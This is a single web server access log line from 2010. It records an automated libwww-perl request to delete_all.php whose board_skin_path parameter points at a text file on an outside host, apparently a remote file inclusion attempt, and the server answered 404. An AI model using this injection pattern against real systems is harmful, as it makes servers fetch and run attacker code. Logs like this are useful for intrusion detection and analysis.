62.67.235.148 - - [14/Feb/2010:07:42:24 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
